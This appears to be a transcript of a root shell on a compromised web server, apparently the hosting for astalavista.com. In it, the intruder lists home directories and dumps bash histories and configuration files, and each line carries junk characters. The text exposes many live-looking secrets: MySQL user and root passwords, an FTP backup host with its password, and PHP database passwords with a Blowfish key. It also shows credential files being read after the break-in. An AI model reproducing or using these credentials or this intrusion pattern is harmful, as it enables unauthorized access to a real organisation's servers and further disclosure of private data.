( h2 ]1 S. z. T+ ^* D2 |# #
( T: O9 B- M+ @* q( S# Available ShortCuts #
: \$ y$ n1 q% a0 j# #
% ?- N% I0 G8 ~# U3 F1 q; O$ v# nst - list active connections #
/ E9 c- Z x6 {) |' a) f' g# ddos - shows how many times each ip is connected #
) f8 M5 J* _. ^4 ~/ r0 [# ltr - restart the webserver ## ^3 S) \ w+ {& I6 D7 F
# phpc - edit the php config file #
2 H6 p7 C5 E5 a% w7 w# htc - edit the webserver configuration file #: B) d8 u: V" X8 b! X& n
# up - uptime #2 f% X( c% [/ m6 t. X- M" J
# etd - edit the motd of the day file #
/ k! ?) `! b. s ?# htr - start and restart apache if needed #
2 T& G( h0 Z; H) M6 Z1 t% O# syng - shows active SYN_RECV connections #
$ D+ Q0 D7 B8 w6 M1 l$ ?4 }# synd - syn flood blocker - “synd -h” for usage #- e$ p: P. v( V+ d; a8 {
#####################################################
7 l. P7 G( X9 Q# P) w) ~# NOTES: #
! T1 l0 {8 ?0 w w4 c4 e. \( f# Last Upgrade - 12-08-2008 by JF #
# \. U0 e' k9 v$ ?# My.cnf/Mysql Optimization - 1-28-09 #1 M. @* ^) ^0 |+ y
# #
" V$ l! Z" J$ r& U4 \# #0 e9 I9 b5 q4 |! o, h4 L
# # T* @( y$ L s; M
#####################################################" x% i; u* P; l1 z* S9 h4 I
: [: Y, l$ e! k4 s% [2 `9 ]; ]sh-3.2# lastlog | grep -v Never& I4 `: s5 L+ |% y# v
Username Port From Latest/ ]1 f; v$ s6 z% v
root pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009
* d" Y' O2 I6 o: o5 Oadmin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008
7 V7 ^; A& Q8 \1 bcom pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009
$ K# D4 Y/ o h' Oastanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009) v: O- L O! N1 `' w
1 L5 i8 j! r$ P# H. |/ L
sh-3.2# ls -la* @# |2 [7 J% P: Y9 n; M% c
total 453376! g/ P7 K. T+ v
drwxr-x— 15 root root 4096 Jun 4 08:40 .
$ ]2 }/ n! _% o. }drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
# ]+ X2 m1 d! V; j, t' p-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip8 `1 I4 ^. j$ N5 }6 O) I
-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg
. W, ^, H# z! W6 I-rw——- 1 root root 16836 Jun 4 07:21 .bash_history* |6 H9 k! T( K1 J9 k0 d
-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout
5 R$ @) A5 a4 r: q C-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile
; Q( d6 P3 r9 T6 u0 r-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc
* m2 ?- ^: L* {# I5 v-rwx—— 1 root root 1899 Oct 28 2007 bk.sh
) U3 u+ y- K$ r-rw-r–r– 1 root root 1327 Nov 29 2007 cert
0 O: T& D' b3 B1 R; ^: D) v( V0 S* s-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql+ O4 k2 t; w( u" J% Y# A
drwxr-xr-x 4 root root 4096 May 20 2008 .cpan( t+ S+ _6 M5 l( p$ [
-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc" W6 H4 @0 z$ ]
-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql
, R2 [+ W& E0 Q' h4 F7 N3 l# Ydrwx—— 2 root root 4096 Oct 28 2007 .elinks
) q0 A8 ?3 l: ^$ p0 \3 Kdrwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1
, [% S1 I" n. d% Q1 F# r-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2
0 x( s7 }: N2 w4 Q- ]$ t* E-rw——- 1 root root 0 Apr 16 13:19 .history
. [9 J, `) [0 t$ ]9 y-rw-r–r– 1 root root 16095 Sep 11 2007 install.log
% B9 \% D) N6 D5 k8 B$ a2 |-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog4 ~- h7 ]+ x' J7 ^" u c! @8 ~2 i! P) R
-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh
" n: M) u/ Y5 n" {4 d S-rw——- 1 root root 35 Jun 2 14:23 .lesshst( |* }- ?9 _( @& t
drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp- r1 t$ c! x4 K2 K( e6 O9 C) U4 k
drwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec' U5 V% q( D+ l7 i5 ^- O
-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz. f/ z9 B9 S0 r0 b5 E
-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2
9 W: g/ B6 @) n' [' H! Y2 X-rwx—— 1 root root 760 Sep 18 2008 lp& E$ u, t: I1 a+ m
drwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1
. y& `- o2 H$ j2 ~$ B-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz
1 P7 a7 q; C f, B' L' Q-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1: U r. O! w4 v' \( V
drwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9 \3 Y. p6 N1 w: \! b
-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz( M% n. ?% d* U% h j0 X
drwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3
3 y% Z( w1 ?. [. O-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz
' C& n" z" Y$ M3 [& ^- ~-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh
8 @$ w L: C4 H9 x-rw——- 1 root root 41 Oct 19 2007 .my.cnf. `, S3 ^* B$ X: W( c
-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history
; r* n; t7 u8 j2 M4 X. _$ d-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport( k0 O( o% j, {" f) R- I
-rw——- 1 root root 41 May 20 2008 .mytop7 N6 Z! S- ?6 r5 _" b
drwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.66 J% W# _0 v8 J; R3 i4 [1 n3 V3 \
-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz/ N5 {' ]! \4 j/ t4 K& O+ R
drwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp7 u& E0 v' J. L7 n
-rw——- 1 root root 1462 Sep 21 2007 opt.php/ t2 s2 i4 t/ ]2 j" F
-rw-r–r– 1 root root 3371 Sep 22 2007 p5 Z5 S$ @7 W& L- w. [. I
-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2# v; a+ d) W1 d+ Y
-rw——- 1 root root 1024 Feb 3 21:32 .rnd
1 u+ X" B8 E0 I-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
: g9 t. y2 ~+ m4 r% V% J-rw-r–r– 1 root root 887 Nov 28 2007 server.key7 {. i% o9 `: A! _+ S8 D+ I/ Q k4 A
drwx—— 2 root root 4096 Oct 10 2008 .ssh3 i% q. ~. f1 n- R/ q6 ^& Q
-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat3 x$ c" a; J- w: d0 e+ F1 P
-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc
3 V B0 s2 M7 W$ R-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip
6 F+ l }. u1 x, a4 V0 D* z-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1. P* D& }: N& s( I1 l; B8 Q) `1 Z
drwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp
& M' k" ?2 F" ]1 d7 X-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh9 E: m( F) P$ [2 i
drwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0
$ V0 O' X" Y1 l9 c+ A0 M& Y-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2, q1 y, G8 C8 C2 D: c. |) i+ \
-rw——- 1 root root 12997 May 16 2008 .viminfo
0 d& [; Z1 m/ z
5 l% F6 ^8 t" ysh-3.2# cat .bash_history
+ A! Q# U& Y7 [% o! n[snip]! i% ^- G( o2 u& c6 r. u' K
wget cp4sst.com/sstlinux.tar.gz, l3 i% [5 G: ]3 g& v* N3 X
tar zxvf sstlinux.tar.gz
2 }& g1 w! `* d1 b1 \8 h4 mcd linux-2.6.27.10
5 E9 b( b. S3 S Qsh install.sh
( L/ V( ?& h* j, xmake bzImage ; make modules ; make modules_install ; make install5 B9 [# Z: d' S
make clean! n. j! |8 n7 Y. @6 Y1 a6 i. z
service mysqld restart
u% i# S8 X/ O7 i {[snip]
* x% S9 u7 u5 Z( I0 X* Ccd /usr/sbin/; x6 ]: [2 ~+ W' d5 J$ F8 i
chmod 4777 traceroute
. S! k. s T% E$ X/ m9 jchmod 4777 ping
# h0 @5 Q6 S0 ?5 etraceroute -I 链接标记[url]www.astalavista.ch[/url]5 v8 w% B l# s9 T) q
[snip]
+ E) O9 g3 G* c0 [vi /etc/csf/csf.conf8 n1 T- I8 D% D7 L& m
traceroute google.ch
[2 n1 P5 j4 Xservice csf restart
; [* v. t2 s, \% f' n- K, Y% \tracert google.ch
! o! y$ D/ Q% w2 Z: Gservice csf restart8 J" w1 M% ]& ~" v/ P6 U* e' h/ [& S6 `
traceroute 链接标记[url]www.google.ch[/url]5 U/ V# p, i: h+ p
tracert 链接标记[url]www.google.ch[/url]
T6 v9 ]1 c$ Wtraceroute 链接标记[url]www.google.ch[/url]# M _: G! a& B. I
locate traceroute
. {/ C: c: r7 Bchown 4755 /bin/traceroute
' }2 _2 Y/ N' U" }0 y, t1 wchown 4777 /bin/traceroute
! g( y; I1 _. k$ M" b* glocate ping n& {) \, N# Z4 D: Y4 p
chown 4755 /bin/ping9 d' C! f" }5 B! E
chown 4777 /bin/ping
8 G$ T, f2 m% Y: [4 |! zcd /bin/, B# e) g# [9 }
ls -ali | grep ping; v+ c" t. ~, Z ^0 H1 m$ R
chown root ping
- E& r* R, r _2 e/ n/ wchmod 4755 ping$ m, i/ I& m% ?; c7 ^* J
ls -ali | grep traceroute+ e) c- x9 f! m" v# _( @5 X
chown root traceroute
" k! e0 z/ u& v# ^8 _* O W, F: x) vchmod 4755 traceroute
# O& H q* G" k) E9 ^ls -ali | grep traceroute& j" Z/ ~: w5 s2 [
traceroute -I 链接标记[url]www.google.ch[/url]
0 }" Z1 Y( v' \( e0 p; Ttraceroute 链接标记[url]www.google.ch[/url]
" ?; M1 j6 ]6 A% X6 }9 A% B- p' b0 ?whois pmsantos.ch
; @7 @; B" M8 K[snip]
4 v2 ?9 U8 h% _/ g- T7 h) ymysql -h com_contrexx2_live < /root/defaultp_ports.sql
+ h5 b7 E: L- u6 k, x9 r/ r4 y' @mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql; k* S8 |/ ~' S J/ ]/ J+ y& i( y
mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql7 M7 S u7 l( D- t. U3 l3 e! t
mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql
" s. D" L" [4 g' V) j* e7 vtop! P; ]: Y# c8 o0 \2 }9 P# D7 S3 X
ping ssth.ch
* d5 x1 j" a! g& q( g! Z* F# r. dping asdlkfaljgasd???ljg???lasj.ch
3 T) w. P! m/ |- u3 [0 bping asdlkfaljgasdlasj.ch6 v6 G4 k; L, Q/ `" {0 u; n
ping 链接标记[url]www.ssth.ch[/url]1 D7 H" y G2 `" y; G
ping ssth.ch: |7 H6 M: a1 n' t6 n! k7 Z
nslookup 链接标记[url]www.google.ch[/url]2 h8 v4 @& {/ I3 ?( e; z8 ?
nslookup 链接标记[url]www.ssth.ch[/url]
I, f# ^& x4 E) [% h4 ?- wman nslookup
9 F( N* \' e9 @& p/ ^9 hping 链接标记[url]www.google.ch[/url]0 q. v% d: t6 n- u
nslookup 链接标记[url]www.google.ch[/url]: P/ J; Y# u# U2 i; V/ X
nslookup 链接标记[url]www.google.ch[/url]
/ m% [; Y" a0 f( Y$ I* |nslookup salfjasdlf.ch4 m7 e% r( O7 C
[snip]
2 U8 |! u' y, \( i' Wopenssl passwd -1 sadf8 O+ G$ a" M7 Q6 x0 m4 x% ^4 w
openssl passwd -1 5cZNHstdTy, [: q' H/ h5 {/ s$ i& G! Y* a9 ]3 V& Y
mysql( S9 X5 O9 F- I. B" {7 M4 M5 l# Q' B
mysql1 S h6 e# ? S; O8 r! p( S) {
locate proftp
+ g# X: Z0 T! t, K" ~4 r( P( Lvi /etc/proftpd.passwd9 A" o: O4 W% Y; F0 I1 h2 V* F
service proftpd restart
( {* y; T" c9 i1 C7 N8 llocate proftpd.conf
2 e( h3 U. P/ r( u, t) _5 D- K Pvi /etc/proftpd.conf! Z" g; l4 C' R3 n
vi /etc/proftpd.passwd6 V4 `" w! \6 Z( _2 `
service proftpd restart
9 }1 c& r# z! H; F; L0 r[snip]4 i% ]* e$ t$ P
/bin/sh /home/com/backup_system/backup.sh
- O$ ]. Y: h6 J5 i! z) {: utar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin" x! O6 z/ c* o( _2 [# x; n* u) F
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql
# d4 T' b% H. z" w; \. r. Z/ a! Cmysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql" G1 g9 p: ?. P# W% W
ls -ali" d/ j# r/ ^0 g3 i
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql
; b' m1 Q6 v3 Q) r" x- v) Zmysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql7 y5 a5 z6 ]+ `- \5 N2 u7 S
crontab -l" i# i1 z# a3 x7 I
crontab -l
' z- U8 [) {& @ O, @! A3 Jphp -q /home/com/public_html/modifications/cronjobs/securitynews.php w) U1 I4 t e1 ?9 j: g
/home/com/public_html/modifications/cronjobs/exploits.sh
3 V& k$ f; [/ {: n& q) Mwget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]% o: S* |: }7 \& v1 N2 I* X- [
tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz
7 _/ @* c& `. H. L( j, t: O" [ Zcd lsws-4.0.3
" r6 C! ]5 ^1 C( psh install.sh
0 B8 p, V/ A& a6 j' b. o1 puptime8 s: _% [+ ^: x; @9 E+ }
hdparm -tt /dev/sda P8 H: O8 q$ e; O+ b2 P
iostat
. ^# v- o6 }' k dyum install iostat
3 S4 l" V3 z/ P6 K8 d* p+ ?0 ^iostat2 a, b/ l. C8 c/ [* {7 P' B
whereis iostat3 y2 `: R& o( \0 k
yjm clean all" Q" j- O* K; S# r* u8 t" m ]- y1 P- J
yum clean all ; yum -y update! ?; Q% r+ l3 K/ v3 o! s$ y
iostat6 a/ ]% Y7 Z9 W+ B2 H
yum install systat' L8 e0 ?# K! Z
rpm -qa | grep iostat
+ h7 G+ G$ C/ J4 k. nrpm -qa | grep sysstat+ |0 ^) L0 V. U- p( ^4 R
rpm -qa | grep systat
' P8 W/ q4 J2 ~2 x! |( D; Ndmesg -c
, M: K+ ?; [. w8 Ksysctl -p
4 j4 @5 W2 B1 k, H, o! r" [) Xuname -r1 C/ v' @- T& V
cd /usr/src6 ]- e2 H' |8 ?3 z+ K, ]+ z; y
wget nix101.com/kernels/sstlinux.tar.gz" ^" P& @& e" y2 r- x) [* }
shutdown -r now
& m$ P9 y3 Y0 Q1 V7 }+ G* C$ M inano -w /boot/grub/grub.conf; N' P3 ?; e) L0 x ?$ k8 D \. V3 ^
: s9 ]: d9 u8 R; l3 t }$ U1 q* ksh-3.2# cat .my.cnf+ g0 ^+ P' H) ]' q( V( p8 G) s+ |7 d6 M
[client]# L! p4 d5 \. ~& C& d
user=da_admin" B) d- r. j( H* S+ e
password=X9dctmRH* W, Y. Y% V5 g7 D
2 I5 s0 `/ L2 `" g& |! gsh-3.2# cat /home/com/backup_system/backup.sh3 P( O% O0 ~3 q/ Q6 H0 X8 s3 N; i
#!/bin/sh
: t B k6 }! ~- s) @#####################################################################5 [0 X7 k! I& r+ k
# #
9 v! S/ c) N. {6 I$ Z! N# incremental backup for astalavista.com #1 a) L% e( ~+ H! G( P2 p
# #
5 Q H2 s2 g. k M- ^7 M# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #
- K1 a, h, R: v b# #
5 E" [" l% B3 d& ]* l% w#####################################################################5 A8 n2 t+ w" u8 F o* K
[snip]; w1 O; E' v" q
PROG_DIR=”/home/com/backup_system”;
3 }; t( C# o* x: T% o% SBACKUP_DIR=”/home/com/backups”;
1 W( q1 W' H7 Q# uDOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;
4 `2 n: B% o, m3 E1 {# d" B# ftp for synology backup server0 V: `( }8 B$ S2 j% T' ]
FTP_HOST=”212.254.194.163″;
! H# Y& E% P' @3 }* F: {* s/ {FTP_PORT=”21″;4 w# y0 }& a0 n4 M: G0 a$ u
FTP_USER=”astalavista.com”;
- X& J' z. `$ Q5 R MFTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;
0 Q# ^6 G( @" _3 oFTP_DIR=”/astalavista.com”;
& H6 R1 f/ F% `4 d# database. i& w3 O/ G3 B2 U
DB_HOST=”localhost”;
1 l3 N. @0 M* N3 S) ~1 a. _4 V( `DB_USER=”contrexxuser2″;
7 G9 v6 W9 X7 l5 aDB_PASS=”0fEYNZgXz1pKe”;! f0 _ h! W X# N
DB_DATABASE1=”com_contrexx2_live”;
5 g& x$ S2 D* SDB_DATABASE2=”com_contrexx2″;
6 g, e) {1 | x9 A( h- P. [7 l[snip]! C5 R! @2 @9 l' o5 K0 a
ftp -in $FTP_HOST $FTP_PORT <<EOF7 u5 v3 g; ?$ a) ~9 j$ o, M; w
quote USER $FTP_USER
' P; z6 u! O) Q) ]3 e9 G0 b; m! ?+ ]quote PASS $FTP_PASS
N; a0 O& }) F* `0 Bcd $FTP_DIR& _4 t ^ v9 b" }, C+ ?; x
put $DB_FULLNAME-SQL_Dump.tar
6 I& G* q5 l0 [* w" V; fput $BACKUP_FULLNAME-Public_HTML.tar" }1 B# {7 M: A* I# c2 ` [! o
close/ N8 O2 w3 D" U
bye
1 U# [# t/ d `/ m6 rEOF
# F" v. l: E, o
8 a6 f ?9 V* n/ `9 x0 U+ ksh-3.2# cd /home7 l- i3 d& g4 Q' f5 k$ i- x
sh-3.2# ls -la( B# V8 l7 y: ?. \+ s/ I* G2 m6 C
total 120. c F3 R! F' h2 d6 o8 {$ ^
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .
- |4 x# ~) P) q: V0 ?drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
m1 d; ?/ H& V$ @- Q* Cdrwx–x–x 9 admin admin 4096 Nov 28 2007 admin
+ H$ P; {7 [6 @ x E: F2 ^-rw——- 1 root root 8192 Jun 4 03:03 aquota.group3 }. ?2 ?. D" Z1 \' w
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
6 T+ p; _2 f& e9 G0 r6 bdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
+ I0 u2 N" w5 P* a" s- M$ fdrwxr-xr-x 2 root root 4096 Jul 29 2008 backup
1 m8 ^1 W, {. Adrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
9 F" S9 w/ y4 I+ D: jdrwx–x–x 10 com com 4096 Apr 28 12:40 com
8 r' n0 j0 e2 k. D: ~! ndrwxr-xr-x 2 root root 4096 May 17 2007 ftp
$ j% A3 w" h9 e% h" m% j! kdrwx—— 3 jon jon 4096 Sep 21 2007 jon; S* \& w9 U: |0 U
drwx—— 2 root root 16384 Sep 11 2007 lost+found3 s% n4 a+ M6 V: p: ^! @
drwxr-xr-x 2 root root 4096 Sep 14 2007 my
, g4 r2 u: h7 r5 c: {drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata# ?4 Z' z& a/ Y4 S( b
drwx—— 2 jon jon 4096 Sep 15 2007 test" A v2 _6 ?) {+ o+ V
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
6 l9 g$ O; c! i( V0 n, V; I" T8 |3 G" D W) l
sh-3.2# cd admin
" Y8 j, ]- M- R7 k! k& [sh-3.2# ls -la
8 ~; l0 j) V5 l7 i# `3 ^% E1 Stotal 1735896: O, \! `& E) U
drwx–x–x 9 admin admin 4096 Nov 28 2007 .
7 R+ e# R: g5 g( y- Z( E3 |drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..1 K' }8 M# ^- g+ }, ~
drwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups
3 N8 x0 h" `3 {7 H$ c' f: a/ pdrwx—— 2 admin admin 4096 Sep 28 2007 backups% X" @. e+ R+ r7 I) c& K2 h- `
-rw——- 1 admin admin 860 Sep 17 2008 .bash_history
, q; z( u) ^' F8 T& N% w# V-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout$ ]) ? w) y* l% Q1 e1 r8 ?( G
-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile: r; j/ c4 ]3 @+ R/ K8 H- _$ b, X: V
-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc
) D, L' S3 k+ A3 v% i' C+ _! m hdrwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups* |7 m w4 W5 u
drwx–x–x 6 admin admin 4096 Sep 21 2007 domains9 f7 {! I n8 ]& I* M
drwxrwx— 3 admin mail 4096 Sep 21 2007 imap+ b. l1 s3 g8 M' ]- Y9 H
-rw-r–r– 1 root root 24 Sep 21 2007 info.php
; h1 E" Q( L% g# F1 }! N4 c! hdrwx—— 2 admin admin 4096 Sep 21 2007 mail
. z1 h* \, G* ]. k7 X6 K-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
3 l* k3 Q2 m8 ?3 c/ l3 C3 K-rw-r–r– 1 root root 887 Nov 28 2007 server.key, S% K3 ^- i: A0 ` O& h7 G* p
-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow
: \% \1 y0 Y+ m B' `+ S0 E& T" b-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz
5 O, D3 } [% O2 U- `drwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups
: G k, r" t" S5 O! n& g
% A; a' ]0 [# E0 R6 v+ z# xsh-3.2# ..
0 [# ~; J% G. U/ qsh-3.2# cd jon _4 T9 d7 i* ? q m
sh-3.2# ls -la/ |( d" [7 N" V3 G# {* Q# ~
total 36
! }: _1 |& _' D( W' e( A, Hdrwx—— 3 jon jon 4096 Sep 21 2007 .
- v" N8 I- s: h8 T; X0 ?. ~drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
+ m5 r( e! p' Y2 H-rw——- 1 jon jon 53 Sep 21 2007 .bash_history& p; f) O ~, I$ L% S& ]. v5 y
-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout, o. I, Z6 _. o# U+ J$ S
-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile
. F- Z- |" C& `3 o! }-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc. Y9 \8 G- h5 V/ B
-rw-r–r– 1 root root 24 Sep 21 2007 info.php
: ~, D8 ^3 t+ ?0 ]% Udrwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html
1 }( z0 J, h' D0 G/ a' p3 w6 [0 L K! N! O
sh-3.2# cd ..
; q5 `+ \& Q6 H1 O! A$ y+ b1 W* nsh-3.2# cd test( i0 |" m- n# I- f/ P
sh-3.2# ls -la6 S! o; s4 {5 U
total 48
; }/ N: a5 u! @2 \8 Z1 e2 Adrwx—— 2 jon jon 4096 Sep 15 2007 .
G' Z; f5 V7 f4 f- hdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..# P, {4 z: i0 c7 v
-rw——- 1 jon jon 79 Sep 21 2007 .bash_history) u9 Z9 Q! g. W: u4 T% ]3 Y
-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout
! k0 m9 i- G1 t' M+ @; f7 W-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile9 ~& F( [9 d( T% O% S( D& M5 J
-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc
$ ~% t9 w, p8 o: C- Ish-3.2# cat .bash_history
) _' s" z; j7 l9 U1 K1 ?/usr/bin/mysqladmin -u root password PoliuJhytg67) l# k4 s+ S9 T
6 \ o! u' K5 i! n5 rsh-3.2# cd .. j! Y7 y) b( M) A7 A n& ]
sh-3.2# cd astanet) H2 E: W5 Y7 b- V' O5 T& c
sh-3.2# ls -la/ h% _3 t; q3 Q" E6 x# d
total 52, T' b O- {/ b5 k9 {1 f: ]
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .
' {7 t- h: t# r- U6 g. |1 Vdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
& `0 G! q3 y; k O7 c$ o* Q; ndrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth \% }* S+ v" d
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history, t6 Y% d( r4 s- i7 N
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout: G, S" Z. w% n' D5 N# z
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile* N8 J6 _2 I% a" I( u0 h* J
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc2 J- ~7 _5 f# ^2 j! r7 z3 t8 Y
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
/ v* [" c+ i6 E& J6 V5 Rdrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap# N3 H' L3 o1 |+ L6 S3 J7 H" p
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail, W) H2 ^+ T( d
-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history2 L3 V% y5 s: n, x$ ]" _
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html& |& ?+ b6 \* S# X; ?# V
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow% w6 s! s8 T! E) i4 F2 `, C
# d. E( | o0 p; g
sh-3.2# cd auth/
. m: K" }8 d/ G+ `sh-3.2# ls -la
# x" l$ T+ k* Q, u3 p% o2 E* vtotal 28) U! B% x6 J6 y) z
drwxr-xr-x 2 root root 4096 Dec 23 16:00 .1 W7 S# c4 d, [ Y- z
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..
- P& l% L! P V4 K9 Y- D0 O0 v! |-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php& V4 w1 C! B" o9 U( i5 f/ Q. ?8 q
-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php
" W9 i& D1 ?, n- G d-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd
1 k8 t3 F+ ^5 s' L-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting
" I p7 o) {4 T" k3 z2 w! |-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd$ g/ M. ~! Y+ c# ?3 {1 w
& c) T: }7 c m9 ash-3.2# cat hackercontest.config.inc.php
8 z# z. A5 F, d( b9 x<?PHP$ u6 h: S( v, }" Z
// Variabeln f?r Verbindung zur Datenbank //2 a" S* W& X5 j7 E% g3 d
$conxHost = ‘localhost’; // MySQL hostname$ Z4 f: f* W, {& c8 q4 |- H
$conxUser = ‘hackercontest’; // MySQL user
2 p. o& Z' F; b$conxPassword = ‘K6m@7dUc’; // MySQL password8 Q3 |' E& k$ X8 P3 y4 @
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
! V3 i2 M4 q7 b" |?>
1 O: B! T5 T! Vsh-3.2# cat hosting.config.inc.php9 o) N9 Y' a5 Q
<?PHP
0 b+ J7 f. b! D7 H8 v1 O1 N3 K// Variabeln f?r Verbindung zur Datenbank //3 k( S: c' |6 x* g# I, K4 u
$conxHost = ‘localhost’; // MySQL hostname+ o/ X' U# O \! C8 R" Z+ c! |9 w
$conxUser = ‘hostinguser’; // MySQL user1 N; }' j7 l0 S: T- u% I
$conxPassword = ‘cXvB3981′; // MySQL password/ j) K9 s4 z9 R
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish3 }( t5 Y; }% V
?>
7 a. F; s& s1 K; W! V ^8 h, _. L! Y q2 I0 b: k
sh-3.2# cd ..
- S. c- W# Q" c A# Dsh-3.2# cd com# e) r4 Q: _, m( F3 Y9 E
sh-3.2# ls -la
. Z& J2 E5 E. G, p8 Z; Q0 u! u# U3 ntotal 141208
& x/ }. x1 D& S5 N0 Ddrwx–x–x 10 com com 4096 Apr 28 12:40 .5 k5 z Q8 V7 K4 m _: e
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
* d# p. R% u; i: Idrwx—— 2 com com 4096 Jun 4 04:04 backups! P V* \) K5 A- ^) v0 R
-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql
